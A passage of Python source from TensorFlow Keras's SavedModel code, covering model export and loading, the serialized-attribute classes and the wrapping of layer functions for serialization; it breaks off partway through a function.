from tensorflow.python.keras.utils.generic_utils import deserialize_keras_object
from tensorflow.python.keras.utils.io_utils import ask_to_proceed_with_overwrite
from tensorflow.python.lib.io import file_io
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import builder as saved_model_builder
from tensorflow.python.saved_model import constants
from tensorflow.python.saved_model import load
from tensorflow.python.saved_model import model_utils
from tensorflow.python.saved_model import save as save_lib
from tensorflow.python.saved_model import utils_impl as saved_model_utils
from tensorflow.python.training import saver as saver_lib
from tensorflow.python.training.tracking import base as trackable
from tensorflow.python.training.tracking import data_structures
from tensorflow.python.training.tracking import graph_view
from tensorflow.python.training.tracking import layer_utils as trackable_layer_utils
from tensorflow.python.training.tracking.tracking import AutoTrackable
from tensorflow.python.training.tracking.tracking import delete_tracking
from tensorflow.python.util import compat
from tensorflow.python.util import deprecation
from tensorflow.python.util import nest
from tensorflow.python.util.lazy_loader import LazyLoader
from tensorflow.python.util.tf_export import keras_export
# To avoid circular dependencies between keras/engine and keras/saving,
# code in keras/saving must delay imports.
# TODO(b/134426265): Switch back to single-quotes to match the rest of the file
# once the issue with copybara is fixed.
# pylint:disable=g-inconsistent-quotes
metrics_lib = LazyLoader("metrics_lib", globals(),
"tensorflow.python.keras.metrics")
models_lib = LazyLoader("models_lib", globals(),
"tensorflow.python.keras.models")
base_layer = LazyLoader(
"base_layer", globals(),
"tensorflow.python.keras.engine.base_layer")
network_lib = LazyLoader(
"network_lib", globals(),
"tensorflow.python.keras.engine.network")
sequential = LazyLoader(
"sequential", globals(),
"tensorflow.python.keras.engine.sequential")
training_lib = LazyLoader(
"training_lib", globals(),
"tensorflow.python.keras.engine.training")
input_layer = LazyLoader(
"input_layer", globals(),
"tensorflow.python.keras.engine.input_layer")
# pylint:enable=g-inconsistent-quotes
@deprecation.deprecated(
date=None,
instructions=('Please use `model.save(..., save_format="tf")` or '
'`tf.keras.models.save_model(..., save_format="tf")`.'))
@keras_export('keras.experimental.export_saved_model')
def export_saved_model(model,
saved_model_path,
custom_objects=None,
as_text=False,
input_signature=None,
serving_only=False):
"""Exports a `tf.keras.Model` as a Tensorflow SavedModel.
Note that at this time, subclassed models can only be saved using
`serving_only=True`.
The exported `SavedModel` is a standalone serialization of Tensorflow objects,
and is supported by TF language APIs and the Tensorflow Serving system.
To load the model, use the function
`tf.keras.experimental.load_from_saved_model`.
The `SavedModel` contains:
1. a checkpoint containing the model weights.
2. a `SavedModel` proto containing the Tensorflow backend graph. Separate
graphs are saved for prediction (serving), train, and evaluation. If
the model has not been compiled, then only the graph computing predictions
will be exported.
3. the model's json config. If the model is subclassed, this will only be
included if the model's `get_config()` method is overwritten.
Example:
```python
import tensorflow as tf
# Create a tf.keras model.
model = tf.keras.Sequential()
model.add(tf.keras.layers.Dense(1, input_shape=[10]))
model.summary()
# Save the tf.keras model in the SavedModel format.
path = '/tmp/simple_keras_model'
tf.keras.experimental.export_saved_model(model, path)
# Load the saved keras model back.
new_model = tf.keras.experimental.load_from_saved_model(path)
new_model.summary()
```
Args:
model: A `tf.keras.Model` to be saved. If the model is subclassed, the flag
`serving_only` must be set to True.
saved_model_path: a string specifying the path to the SavedModel directory.
custom_objects: Optional dictionary mapping string names to custom classes
or functions (e.g. custom loss functions).
as_text: bool, `False` by default. Whether to write the `SavedModel` proto
in text format. Currently unavailable in serving-only mode.
input_signature: A possibly nested sequence of `tf.TensorSpec` objects, used
to specify the expected model inputs. See `tf.function` for more details.
serving_only: bool, `False` by default. When this is true, only the
prediction graph is saved.
Raises:
NotImplementedError: If the model is a subclassed model, and serving_only is
False.
ValueError: If the input signature cannot be inferred from the model.
AssertionError: If the SavedModel directory already exists and isn't empty.
"""
if serving_only:
save_lib.save(
model,
saved_model_path,
signatures=saving_utils.trace_model_call(model, input_signature))
else:
_save_v1_format(model, saved_model_path, custom_objects, as_text,
input_signature)
try:
_export_model_json(model, saved_model_path)
except NotImplementedError:
logging.warning('Skipped saving model JSON, subclassed model does not have '
'get_config() defined.')
def _export_model_json(model, saved_model_path):
"""Saves model configuration as a json string under assets folder."""
model_json = model.to_json()
model_json_filepath = os.path.join(
saved_model_utils.get_or_create_assets_dir(saved_model_path),
compat.as_text(constants.SAVED_MODEL_FILENAME_JSON))
file_io.write_string_to_file(model_json_filepath, model_json)
def _export_model_variables(model, saved_model_path):
"""Saves model weights in checkpoint format under variables folder."""
saved_model_utils.get_or_create_variables_dir(saved_model_path)
checkpoint_prefix = saved_model_utils.get_variables_path(saved_model_path)
model.save_weights(checkpoint_prefix, save_format='tf', overwrite=True)
return checkpoint_prefix
def _save_v1_format(model, path, custom_objects, as_text, input_signature):
"""Exports model to v1 SavedModel format."""
if not model._is_graph_network: # pylint: disable=protected-access
if isinstance(model, sequential.Sequential):
# If input shape is not directly set in the model, the exported model
# will infer the expected shapes of the input from the model.
if not model.built:
raise ValueError('Weights for sequential model have not yet been '
'created. Weights are created when the Model is first '
'called on inputs or `build()` is called with an '
'`input_shape`, or the first layer in the model has '
'`input_shape` during construction.')
# TODO(kathywu): Build the model with input_signature to create the
# weights before _export_model_variables().
else:
raise NotImplementedError(
'Subclassed models can only be exported for serving. Please set '
'argument serving_only=True.')
builder = saved_model_builder._SavedModelBuilder(path) # pylint: disable=protected-access
# Manually save variables to export them in an object-based checkpoint. This
# skips the `builder.add_meta_graph_and_variables()` step, which saves a
# named-based checkpoint.
# TODO(b/113134168): Add fn to Builder to save with object-based saver.
# TODO(b/113178242): This should only export the model json structure. Only
# one save is needed once the weights can be copied from the model to clone.
checkpoint_path = _export_model_variables(model, path)
# Export each mode. Use ModeKeys enums defined for `Estimator` to ensure that
# Keras models and `Estimator`s are exported with the same format.
# Every time a mode is exported, the code checks to see if new variables have
# been created (e.g. optimizer slot variables). If that is the case, the
# checkpoint is re-saved to include the new variables.
export_args = {'builder': builder,
'model': model,
'custom_objects': custom_objects,
'checkpoint_path': checkpoint_path,
'input_signature': input_signature}
has_saved_vars = False
if model.optimizer:
if isinstance(model.optimizer, (optimizers.TFOptimizer,
optimizer_v2.OptimizerV2)):
_export_mode(mode_keys.ModeKeys.TRAIN, has_saved_vars, **export_args)
has_saved_vars = True
_export_mode(mode_keys.ModeKeys.TEST, has_saved_vars, **export_args)
else:
logging.warning(
'Model was compiled with an optimizer, but the optimizer is not from '
'`tf.train` (e.g. `tf.train.AdagradOptimizer`). Only the serving '
'graph was exported. The train and evaluate graphs were not added to '
'the SavedModel.')
_export_mode(mode_keys.ModeKeys.PREDICT, has_saved_vars, **export_args)
builder.save(as_text)
def _get_var_list(model):
"""Returns list of all checkpointed saveable objects in the model."""
var_list, _, _ = graph_view.ObjectGraphView(model).serialize_object_graph()
return var_list
def create_placeholder(spec):
return K.placeholder(shape=spec.shape, dtype=spec.dtype, name=spec.name)
def _export_mode(
mode, has_saved_vars, builder, model, custom_objects, checkpoint_path,
input_signature):
"""Exports a model, and optionally saves new vars from the clone model.
Args:
mode: A `tf.estimator.ModeKeys` string.
has_saved_vars: A `boolean` indicating whether the SavedModel has already
exported variables.
builder: A `SavedModelBuilder` object.
model: A `tf.keras.Model` object.
custom_objects: A dictionary mapping string names to custom classes
or functions.
checkpoint_path: String path to checkpoint.
input_signature: Nested TensorSpec containing the expected inputs. Can be
`None`, in which case the signature will be inferred from the model.
Raises:
ValueError: If the train/eval mode is being exported, but the model does
not have an optimizer.
"""
compile_clone = (mode != mode_keys.ModeKeys.PREDICT)
if compile_clone and not model.optimizer:
raise ValueError(
'Model does not have an optimizer. Cannot export mode %s' % mode)
model_graph = ops.get_default_graph()
with ops.Graph().as_default() as g, K.learning_phase_scope(
mode == mode_keys.ModeKeys.TRAIN):
if input_signature is None:
input_tensors = None
else:
input_tensors = nest.map_structure(create_placeholder, input_signature)
# Clone the model into blank graph. This will create placeholders for inputs
# and targets.
clone = models_lib.clone_and_build_model(
model, input_tensors=input_tensors, custom_objects=custom_objects,
compile_clone=compile_clone)
# Make sure that iterations variable is added to the global step collection,
# to ensure that, when the SavedModel graph is loaded, the iterations
# variable is returned by `tf.compat.v1.train.get_global_step()`. This is
# required for compatibility with the SavedModelEstimator.
if compile_clone:
g.add_to_collection(ops.GraphKeys.GLOBAL_STEP, clone.optimizer.iterations)
# Extract update and train ops from train/test/predict functions.
train_op = None
if mode == mode_keys.ModeKeys.TRAIN:
clone._make_train_function() # pylint: disable=protected-access
train_op = clone.train_function.updates_op
elif mode == mode_keys.ModeKeys.TEST:
clone._make_test_function() # pylint: disable=protected-access
else:
clone._make_predict_function() # pylint: disable=protected-access
g.get_collection_ref(ops.GraphKeys.UPDATE_OPS).extend(clone.state_updates)
with session.Session().as_default():
clone_var_list = _get_var_list(clone)
if has_saved_vars:
# Confirm all variables in the clone have an entry in the checkpoint.
status = clone.load_weights(checkpoint_path)
status.assert_existing_objects_matched()
else:
# Confirm that variables between the clone and model match up exactly,
# not counting optimizer objects. Optimizer objects are ignored because
# if the model has not trained, the slot variables will not have been
# created yet.
# TODO(b/113179535): Replace with trackable equivalence.
_assert_same_non_optimizer_objects(model, model_graph, clone, g)
# TODO(b/113178242): Use value transfer for trackable objects.
clone.load_weights(checkpoint_path)
# Add graph and variables to SavedModel.
# TODO(b/113134168): Switch to add_meta_graph_and_variables.
clone.save_weights(checkpoint_path, save_format='tf', overwrite=True)
builder._has_saved_variables = True # pylint: disable=protected-access
# Add graph to the SavedModel builder.
builder.add_meta_graph(
model_utils.EXPORT_TAG_MAP[mode],
signature_def_map=_create_signature_def_map(clone, mode),
saver=saver_lib.Saver(
clone_var_list,
# Allow saving Models with no variables. This is somewhat odd, but
# it's not necessarily a bug.
allow_empty=True),
init_op=variables.local_variables_initializer(),
train_op=train_op)
return None
def _create_signature_def_map(model, mode):
"""Creates a SignatureDef map from a Keras model."""
inputs_dict = {name: x for name, x in zip(model.input_names, model.inputs)}
if model.optimizer:
targets_dict = {x.name.split(':')[0]: x
for x in model._targets if x is not None} # pylint: disable=protected-access
inputs_dict.update(targets_dict)
outputs_dict = {name: x
for name, x in zip(model.output_names, model.outputs)}
metrics = saving_utils.extract_model_metrics(model)
# Add metric variables to the `LOCAL_VARIABLES` collection. Metric variables
# are by default not added to any collections. We are doing this here, so
# that metric variables get initialized.
local_vars = set(ops.get_collection(ops.GraphKeys.LOCAL_VARIABLES))
vars_to_add = set()
if metrics is not None:
for key, value in six.iteritems(metrics):
if isinstance(value, metrics_lib.Metric):
vars_to_add.update(value.variables)
# Convert Metric instances to (value_tensor, update_op) tuple.
metrics[key] = (value.result(), value.updates[0])
# Remove variables that are in the local variables collection already.
vars_to_add = vars_to_add.difference(local_vars)
for v in vars_to_add:
ops.add_to_collection(ops.GraphKeys.LOCAL_VARIABLES, v)
export_outputs = model_utils.export_outputs_for_mode(
mode,
predictions=outputs_dict,
loss=model.total_loss if model.optimizer else None,
metrics=metrics)
return model_utils.build_all_signature_defs(
inputs_dict,
export_outputs=export_outputs,
serving_only=(mode == mode_keys.ModeKeys.PREDICT))
def _assert_same_non_optimizer_objects(model, model_graph, clone, clone_graph): # pylint: disable=unused-argument
"""Asserts model and clone contain the same trackable objects."""
# TODO(fchollet, kathywu): make sure this works in eager mode.
return True
@deprecation.deprecated(
date=None,
instructions=('The experimental save and load functions have been '
'deprecated. Please switch to `tf.keras.models.load_model`.'))
@keras_export('keras.experimental.load_from_saved_model')
def load_from_saved_model(saved_model_path, custom_objects=None):
"""Loads a keras Model from a SavedModel created by `export_saved_model()`.
This function reinstantiates model state by:
1) loading model topology from json (this will eventually come
from metagraph).
2) loading model weights from checkpoint.
Example:
```python
import tensorflow as tf
# Create a tf.keras model.
model = tf.keras.Sequential()
model.add(tf.keras.layers.Dense(1, input_shape=[10]))
model.summary()
# Save the tf.keras model in the SavedModel format.
path = '/tmp/simple_keras_model'
tf.keras.experimental.export_saved_model(model, path)
# Load the saved keras model back.
new_model = tf.keras.experimental.load_from_saved_model(path)
new_model.summary()
```
Args:
saved_model_path: a string specifying the path to an existing SavedModel.
custom_objects: Optional dictionary mapping names
(strings) to custom classes or functions to be
considered during deserialization.
Returns:
a keras.Model instance.
"""
# restore model topology from json string
model_json_filepath = os.path.join(
compat.as_bytes(saved_model_path),
compat.as_bytes(constants.ASSETS_DIRECTORY),
compat.as_bytes(constants.SAVED_MODEL_FILENAME_JSON))
model_json = file_io.read_file_to_string(model_json_filepath)
model = model_from_json(model_json, custom_objects=custom_objects)
# restore model weights
checkpoint_prefix = os.path.join(
compat.as_text(saved_model_path),
compat.as_text(constants.VARIABLES_DIRECTORY),
compat.as_text(constants.VARIABLES_FILENAME))
model.load_weights(checkpoint_prefix)
return model
################################################################################
# Functional Style/V2 SavedModel functions #
################################################################################
# All serialized attributes are listed within SerializedAttributes classes. See
# the docstring in SerializedAttributes for more context
# All attributes are saved under the 'keras_api' namespace. Only common
# endpoints are attached directly to the root object.
_KERAS_ATTR = 'keras_api'
# Keys for the serialization cache.
# Maps to the keras serialization dict {Layer --> SerializedAttributes object}
_KERAS_CACHE_KEY = 'keras_serialized_attributes'
class SerializedAttributes(object):
"""Class that tracks and validates all serialization attributes.
Keras models contain many Python-defined components. For example, the
trainable_variable property lists the model's trainable variables by
recursively retrieving the trainable variables from each of the child layers.
Another example is model.call, a python function that calls child layers and
adds ops to the backend graph.
Only Tensorflow checkpointable objects and functions can be serialized to
SavedModel. Serializing a Keras model as-is results in a checkpointable object
that does not resemble a Keras model at all. Thus, extra checkpointable
objects and functions must be created during serialization.
**Defining new serialized attributes**
Child classes should be defined using:
SerializedAttributes.with_attributes(
'name', checkpointable_objects=[...], functions=[...], copy_from=[...])
This class is used to cache generated checkpointable objects and functions,
ensuring that new objects and functions are generated a single time.
**Usage during serialization**
Each Layer/Model object should have a corresponding instance of
SerializedAttributes. Create a new instance by calling
`SerializedAttributes.new(obj)`. Objects and functions may be saved using
`.set_and_validate_checkpointable_objects`/`.set_and_and_validate_functions`.
The properties `.checkpointable_objects` and `.functions` returns the cached
values.
**Adding/changing attributes to save to SavedModel**
1. Change the call to `SerializedAttributes.with_attributes` in the correct
class:
- CommonEndpoints: Base attributes to be added during serialization. If
these attributes are present in a Trackable object, it can be
deserialized to a Keras Model.
- LayerAttributes: Attributes to serialize for Layer objects.
- ModelAttributes: Attributes to serialize for Model objects.
2. Update class docstring
3. Update arguments to any calls to `set_and_validate_*`. For example, if
`call_raw_tensors` is added to the ModelAttributes function list, then
a `call_raw_tensors` function should be passed to
`set_and_validate_functions`.
**Common endpoints vs other attributes**
Only common endpoints are attached directly to the root object. Keras-specific
attributes are saved to a separate trackable object with the name "keras_api".
The number of objects attached to the root is limited because any naming
conflicts will cause user code to break.
Another reason is that this will only affect users who call
`tf.saved_model.load` instead of `tf.keras.models.load_model`. These are
advanced users who are likely to have defined their own tf.functions and
trackable objects. The added Keras-specific attributes are kept out of the way
in the "keras_api" namespace.
Properties defined in this class may be used to filter out keras-specific
attributes:
- `functions_to_serialize`: Returns dict of functions to attach to the root
object.
- `checkpointable_objects_to_serialize`: Returns dict of objects to attach to
the root object (including separate trackable object containing
keras-specific attributes)
All changes to the serialized attributes must be backwards-compatible, so
attributes should not be removed or modified without sufficient justification.
"""
@staticmethod
def with_attributes(
name, checkpointable_objects=None, functions=None, copy_from=None):
"""Creates a subclass with all attributes as specified in the arguments.
Args:
name: Name of subclass
checkpointable_objects: List of checkpointable objects to be serialized
in the SavedModel.
functions: List of functions to be serialized in the SavedModel.
copy_from: List of other SerializedAttributes subclasses. The returend
class will copy checkpoint objects/functions from each subclass.
Returns:
Child class with attributes as defined in the `checkpointable_objects`
and `functions` lists.
"""
checkpointable_objects = checkpointable_objects or []
functions = functions or []
if copy_from is not None:
for cls in copy_from:
checkpointable_objects.extend(cls.all_checkpointable_objects)
functions.extend(cls.all_functions)
classdict = {
'all_checkpointable_objects': set(checkpointable_objects),
'all_functions': set(functions)}
return type(name, (SerializedAttributes,), classdict)
@staticmethod
def new(obj):
if isinstance(obj, training_lib.Model):
return ModelAttributes()
elif isinstance(obj, base_layer.Layer):
return LayerAttributes()
else:
raise TypeError('Internal error during serialization: Expected Keras '
'Layer object, got {} of type {}'.format(obj, type(obj)))
def __init__(self):
self._object_dict = {}
self._function_dict = {}
self._keras_trackable = AutoTrackable()
@property
def functions(self):
"""Returns dictionary of all functions."""
return {key: value for key, value in self._function_dict.items()
if value is not None}
@property
def checkpointable_objects(self):
"""Returns dictionary of all checkpointable objects."""
return {key: value for key, value in self._object_dict.items()
if value is not None}
@property
def functions_to_serialize(self):
"""Returns functions to attach to the root object during serialization."""
return {key: value for key, value in self.functions.items()
if key in CommonEndpoints.all_functions}
@property
def objects_to_serialize(self):
"""Returns objects to attach to the root object during serialization."""
objects = {key: value for key, value in self.checkpointable_objects.items()
if key in CommonEndpoints.all_checkpointable_objects}
objects[_KERAS_ATTR] = self._keras_trackable
return objects
def set_and_validate_functions(self, function_dict):
"""Saves function dictionary, and validates dictionary values."""
for key in self.all_functions:
if key in function_dict:
if (function_dict[key] is not None and # Not all functions are required
not isinstance(function_dict[key],
(defun.Function, def_function.Function))):
raise ValueError(
'Function dictionary contained a non-function object: {} (for key'
' {})'.format(function_dict[key], key))
self._function_dict[key] = function_dict[key]
setattr(self._keras_trackable, key, function_dict[key])
else:
raise ValueError('Function {} missing from serialized function dict.'
.format(key))
return self.functions
def set_and_validate_objects(self, object_dict):
"""Saves objects to a dictionary, and validates the values."""
for key in self.all_checkpointable_objects:
if key in object_dict:
if not isinstance(object_dict[key], trackable.Trackable):
raise ValueError(
'Object dictionary contained a non-trackable object: {} (for key'
' {})'.format(object_dict[key], key))
self._object_dict[key] = object_dict[key]
setattr(self._keras_trackable, key, object_dict[key])
else:
raise ValueError('Object {} missing from serialized object dict.')
return self.checkpointable_objects
class CommonEndpoints(SerializedAttributes.with_attributes(
'CommonEndpoints',
checkpointable_objects=['variables', 'trainable_variables',
'regularization_losses'],
functions=['__call__', 'call_and_return_all_conditional_losses',
'_default_save_signature'])):
"""Common endpoints shared by all models loadable by Keras.
List of all attributes:
variables: List of all variables in the model and its sublayers.
trainable_variables: List of all trainable variables in the model and its
sublayers.
regulariation_losses: List of all unconditional losses (losses not dependent
on the inputs) in the model and its sublayers.
__call__: Function that takes inputs and returns the outputs of the model
call function.
call_and_return_all_conditional_losses: Function that returns a tuple of
(call function outputs, list of all losses that depend on the inputs).
_default_save_signature: Traced model call function. This is only included
if the top level exported object is a Keras model.
"""
class LayerAttributes(SerializedAttributes.with_attributes(
'LayerAttributes',
checkpointable_objects=['non_trainable_variables', 'layers', 'metrics',
'layer_regularization_losses'],
functions=['call_and_return_conditional_losses', 'activity_regularizer_fn'],
copy_from=[CommonEndpoints]
)):
"""Layer checkpointable objects + functions that are saved to the SavedModel.
List of all attributes:
All attributes from CommonEndpoints
non_trainable_variables: List of non-trainable variables in the layer and
its sublayers.
layers: List of all sublayers.
metrics: List of all metrics in the layer and its sublayers.
call_and_return_conditional_losses: Function that takes inputs and returns a
tuple of (outputs of the call function, list of input-dependent losses).
The list of losses excludes the activity regularizer function, which is
separate to allow the deserialized Layer object to define a different
activity regularizer.
activity_regularizer_fn: Callable that returns the activity regularizer loss
layer_regularization_losses: List of losses owned only by this layer.
"""
class ModelAttributes(SerializedAttributes.with_attributes(
'ModelAttributes',
copy_from=[LayerAttributes])):
"""Model checkpointable objects + functions that are saved to the SavedModel.
List of all attributes:
All attributes from LayerAttributes (including CommonEndpoints)
"""
# TODO(kathywu): Add attributes `compile_losses` and `compile_metrics`, which
# list all losses and metrics defined by `model.compile`.
def serialize_all_attributes(layer, serialization_cache):
"""Serialize all attributes in the layer."""
save_model_default_signature = False
if _KERAS_CACHE_KEY not in serialization_cache:
keras_cache = serialization_cache[_KERAS_CACHE_KEY] = {}
if isinstance(layer, training_lib.Model):
# Only trace default signature if the root object is a Model. Since the
# keras cache key is only created in this method, we know that the object
# is root if the key does not yet exist in the cache.
save_model_default_signature = True
else:
keras_cache = serialization_cache[_KERAS_CACHE_KEY]
if layer in keras_cache:
return keras_cache[layer]
serialized_attr = keras_cache[layer] = SerializedAttributes.new(layer)
if _should_skip_serialization(layer):
return serialized_attr
function_dict = {}
if save_model_default_signature:
# For compatibility with the tf.Lite Converter, the default save signature
# should be traced without nested calls to other wrapped functions.
# TODO(kathywu): Investigate why having nested calls results in a stateful
# function. Perhaps something to do with losses, which are traced in nested
# calls but not in the flat call.
function_dict['_default_save_signature'] = _default_save_signature(layer)
else:
function_dict['_default_save_signature'] = None
object_dict = _wrap_layer_objects(layer, serialization_cache)
try:
function_dict.update(_wrap_layer_functions(layer, serialization_cache))
except (ValueError, TypeError) as e:
logging.warning('Skipping full serialization of object {}, because an '
'error occurred while tracing layer functions. Error '
'message: {}'.format(layer, e))
else:
# Add checkpointable objects and functions to the SerializedAttribute object
# only if all functions are successfully traced.
# The `set_and_validate_*` function ensures that all required attributes are
# exported with the correct type.
serialized_attr.set_and_validate_objects(object_dict)
serialized_attr.set_and_validate_functions(function_dict)
return serialized_attr
def _should_skip_serialization(layer):
"""Skip serializing extra objects and functions if layer inputs aren't set."""
if isinstance(layer, training_lib.Model):
try:
# pylint:disable=pointless-statement
layer.inputs
layer.input_names
# pylint:enable=pointless-statement
except AttributeError:
# If the model does not have inputs set, because it was not called or its
# input shapes were not recorded, we won't have a signature so can't trace
# a function. But the user may still save an object with this Model
# attached; we won't fail the whole tf.saved_model.save.
logging.warning('Skipping full serialization of Keras model {}, because '
'its inputs are not defined.'.format(layer))
return True
else:
return False
else:
if not layer.built:
logging.warning('Skipping full serialization of Keras layer {}, because '
'it is not built.'.format(layer))
return True
return False
def _wrap_layer_objects(layer, serialization_cache):
"""Returns extra trackable objects to attach to the serialized layer.
Args:
layer: Keras Layer object.
serialization_cache: Dictionary shared between all objects during
serialization.
Returns:
A dictionary containing all checkpointable objects from a
SerializedAttributes object. See LayerAttributes and ModelAttributes for
entire list of objects
"""
# Wrap all regularization losses as tf.functions.
# First, generate list of all regularization losses in this layer and
# sublayers.
all_losses = layer._callable_losses[:] # pylint: disable=protected-access
for child_layer in _list_all_layers(layer):
all_losses.extend(child_layer._callable_losses) # pylint: disable=protected-access
# Next, wrap all loss functions as tf.functions. Use the serialization cache
# to store already-wrapped functions.
keras_loss_cache = serialization_cache.setdefault('keras_losses', {})
wrapped_loss_functions = []
for loss_fn in all_losses:
if loss_fn in keras_loss_cache:
wrapped_loss_functions.append(keras_loss_cache[loss_fn])
else:
wrapped_loss = _wrap_unconditional_loss(loss_fn, len(keras_loss_cache))
keras_loss_cache[loss_fn] = wrapped_loss
wrapped_loss_functions.append(wrapped_loss)
wrapped_layer_losses = [keras_loss_cache[fn]
for fn in layer._callable_losses[:]] # pylint: disable=protected-access
return dict(
variables=data_structures.ListWrapper(layer.variables),
trainable_variables=data_structures.ListWrapper(
layer.trainable_variables),
non_trainable_variables=data_structures.ListWrapper(
layer.non_trainable_variables),
layers=data_structures.ListWrapper(_list_all_layers(layer)),
metrics=data_structures.ListWrapper(layer.metrics),
regularization_losses=data_structures.ListWrapper(
wrapped_loss_functions),
layer_regularization_losses=data_structures.ListWrapper(
wrapped_layer_losses))
def _wrap_layer_functions(layer, serialization_cache):
"""Returns dict of wrapped layer call function and losses in tf.functions.
Args:
layer: Keras Layer object.
serialization_cache: Dictionary shared between all objects during
serialization.
Returns:
A dictionary containing all keras tf.functions to serialize. See
LayerAttributes and ModelAttributes for the list of all attributes.
"""
# Since Sequential models may be modified in place using model.add() or
# model.pop(), don't use saved functions.
if (isinstance(layer, RevivedLayer) and
not isinstance(layer, RevivedSequential)):
return {fn_name: getattr(layer.keras_api, fn_name, None)
for fn_name in LayerAttributes.all_functions}
# Reset the losses of the layer and its children. The call function in each
# child layer is replaced with tf.functions.
original_fns = _replace_child_layer_functions(layer, serialization_cache)
original_losses = _reset_layer_losses(layer)
# Wrap all the layer call and activity regularizer functions.
# Use LayerCallCollection to ensure that all layer call functions (__call__,
# call with losses) are traced with the same inputs.
call_collection = LayerCallCollection(layer)
call_fn_with_losses = call_collection.add_function(
_wrap_call_and_conditional_losses(layer),
'{}_layer_call_and_return_conditional_losses'.format(layer.name))
call_fn = call_collection.add_function(
_extract_outputs_from_fn(layer, call_fn_with_losses),
'{}_layer_call_fn'.format(layer.name))
fns = {'call_and_return_conditional_losses': call_fn_with_losses,
'__call__': call_fn}
if layer.activity_regularizer is not None:
fns['activity_regularizer_fn'] = _wrap_activity_regularizer(layer)
fns['call_and_return_all_conditional_losses'] = (
call_collection.add_function(
_append_activity_regularizer_loss(call_fn_with_losses,
fns['activity_regularizer_fn']),
'{}_layer_call_and_return_all_conditional_losses'.format(layer.name)
))
else:
fns['activity_regularizer_fn'] = None
fns['call_and_return_all_conditional_losses'] = call_fn_with_losses
# Manually trigger traces before restoring the overwritten functions. The
# functions are traced within the layer call context to ensure that layer
# functions (e.g. add_loss) behave as though running in graph mode.
with base_layer_utils.call_context().enter(layer, None, True, None):
for fn in fns.values():
if fn is not None and fn.input_signature is not None:
fn.get_concrete_function()
# Restore overwritten functions and losses
_restore_child_layer_functions(original_fns)
_restore_layer_losses(original_losses)
return fns
def _default_save_signature(layer):
original_losses = _reset_layer_losses(layer)
fn = saving_utils.trace_model_call(layer)
fn.get_concrete_function()
_restore_layer_losses(original_losses)
return fn
def _list_all_layers(obj):
if isinstance(obj, training_lib.Model):
return obj.layers
else:
return trackable_layer_utils.filter_empty_layer_containers(obj._layers) # pylint: disable=protected-access
def _replace_child_layer_functions(layer, serialization_cache):
"""Replaces functions in the children layers with wrapped tf.functions.
This step allows functions from parent layers to reference the wrapped
functions from their children layers instead of retracing the ops.
This function also resets all losses stored in the layer. These are stored in
the returned dictionary. Use `_restore_child_layer_functions` to restore
the original attributes.
Args:
layer: Keras Layer object.
serialization_cache: Dictionary shared between all objects during
serialization.
Returns:
Dictionary mapping layer objects -> original functions and losses:
{ Child layer 1: {
'losses': Original losses,
'call': Original call function
'activity_regularizer': Original activity regularizer},
Child layer 2: ...
}
"""
# pylint: disable=protected-access
original_fns = {}
for child_layer in _list_all_layers(layer):
if child_layer not in serialization_cache[_KERAS_CACHE_KEY]:
layer_fns = (serialize_all_attributes(child_layer, serialization_cache)
.functions)
else:
layer_fns = serialization_cache[_KERAS_CACHE_KEY][child_layer].functions
if not layer_fns:
# This indicates either:
# - circular dependency, which means the current layer's functions
# should be wrapped first.
# - Child layer's inputs are not defined, so its functions have not been
# wrapped. In this case, no replacement is necessary so move on to the
# next child.
continue
original_fns[child_layer] = {
'call': child_layer.call,
'activity_regularizer': child_layer.activity_regularizer
}
with trackable.no_automatic_dependency_tracking_scope(child_layer):
try:
child_layer.activity_regularizer = layer_fns.get(
'activity_regularizer_fn')
except AttributeError:
# Some layers have an unsettable activity regularizer.
pass
child_layer.call = _use_wrapped_call(
child_layer, layer_fns['call_and_return_conditional_losses'])
return original_fns
# pylint: enable=protected-access
def _restore_child_layer_functions(original_fns):
"""Restores attributes replaced with `_replace_child_layer_functions`."""
for child_layer, fns in original_fns.items():
with trackable.no_automatic_dependency_tracking_scope(child_layer):
child_layer.call = fns['call']
try:
child_layer.activity_regularizer = fns['activity_regularizer']
except AttributeError:
pass
# pylint: disable=protected-access
def _reset_layer_losses(parent_layer):
"""Resets losses of layer and its sublayers, and returns original losses."""
losses_dict = {}
for layer in _list_all_layers(parent_layer) + [parent_layer]:
losses_dict[layer] = {'losses': layer._losses[:],
'eager_losses': layer._eager_losses[:]}
with trackable.no_automatic_dependency_tracking_scope(layer):
layer._losses = []
layer._eager_losses = []
return losses_dict
def _restore_layer_losses(losses_dict):
for layer in losses_dict:
with trackable.no_automatic_dependency_tracking_scope(layer):
layer._losses = losses_dict[layer]['losses']
layer._eager_losses = losses_dict[layer]['eager_losses']
# pylint: enable=protected-access
def _use_wrapped_call(layer, call_fn):
"""Creates fn that adds the losses returned by call_fn & returns the outputs.
Args:
layer: A Keras layer object
call_fn: tf.function returned by _wrap_call_and_conditional_losses.
Returns:
function that calls call_fn and returns the outputs. Losses returned by
call_fn are added to the layer losses.
"""
# TODO(kathywu): Support mask argument and multi-input call functions.
def wrapped_call(inputs, **kwargs):
"""Returns the outputs from the call_fn, and adds the losses."""
if layer._expects_training_arg: # pylint: disable=protected-access
training = kwargs.pop('training', None)
if training is None:
training = K.learning_phase()
outputs, losses = tf_utils.smart_cond(
training,
lambda: call_fn(inputs, training=True),
lambda: call_fn(inputs, training=False))
else:
outputs, losses = call_fn(inputs)
layer.add_loss(losses, inputs)
return outputs
return wrapped_call
class LayerCallCollection(object):
"""Groups wrapped layer call functions.
This is used to ensure that all layer call functions are traced with the same
inputs-
- call
- call_and_return_conditional_losses
- call_and_return_all_conditional_losses
"""
def __init__(self, layer):
self._layer = layer
self._expects_training_arg = layer._expects_training_arg # pylint: disable=protected-access
self._input_signature = self._generate_input_signature(layer)
self._functions = weakref.WeakValueDictionary()
# Bool indicating whether this object is currently tracing the layer call
# functions.
self.tracing = False
def _generate_input_signature(self, layer):
"""Inspects layer object and returns the inferred input signature.
Args:
layer: Layer object.
Returns:
List of possibly nested TensorSpecs of the layer call function inputs.
The list does not contain the `training` argument.
"""
if (isinstance(layer.call, def_function.Function) and
layer.call.input_signature is not None):
return layer.call.input_signature
else:
if isinstance(layer, training_lib.Model):
return saving_utils.model_input_signature(layer)
elif layer.input_spec is not None:
def to_tensor_spec_or_none(x):
spec = input_spec.to_tensor_spec(x, layer.dtype)
# If the shape is too general (e.g. multiple dimensions are allowed),
# return None so that separate functions can be generated for each
# inferred input signature.
# TODO(b/134962016): currently partial signatures are not supported.
if spec.shape == tensor_shape.TensorShape(None):
return None
return spec
input_signature = [nest.map_structure(
to_tensor_spec_or_none, layer.input_spec)]
